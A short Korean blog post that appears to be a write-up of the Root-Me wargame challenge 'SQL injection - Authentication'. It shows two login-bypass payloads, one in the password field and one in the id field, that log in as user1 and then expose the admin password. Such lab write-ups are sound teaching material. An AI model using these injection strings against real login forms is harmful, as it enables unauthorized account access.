rootme - SQL injection - Authentication

2021. 3. 7. 12:38WarGame/Rootme

해당 문제를 접속하면

 

 

로그인 창이 나오는데

 

id : admin

pw : 1'or'1=1-- -

을 입력하면

 

 

user1 계정을 알 수 있고,

 

 

개발자 도구에서 password가 확인이 가능합니다.

하지만 우리가 원하는건 admin password이니 쿼리를 조금 수정해주면

 

id : admin' or '1'='1 -- -

pw : 1234

 

admin password를 획득할 수 있습니다(grin)

'WarGame > Rootme' 카테고리의 다른 글

rootme - Local File Inclusion  (0) 2021.03.10
rootme - Directory traversal  (0) 2021.03.08
rootme - File upload - MIME type  (0) 2021.03.06
rootme - HTTP - Cookies  (0) 2021.03.05
rootme - File upload - Double extensions  (0) 2021.03.04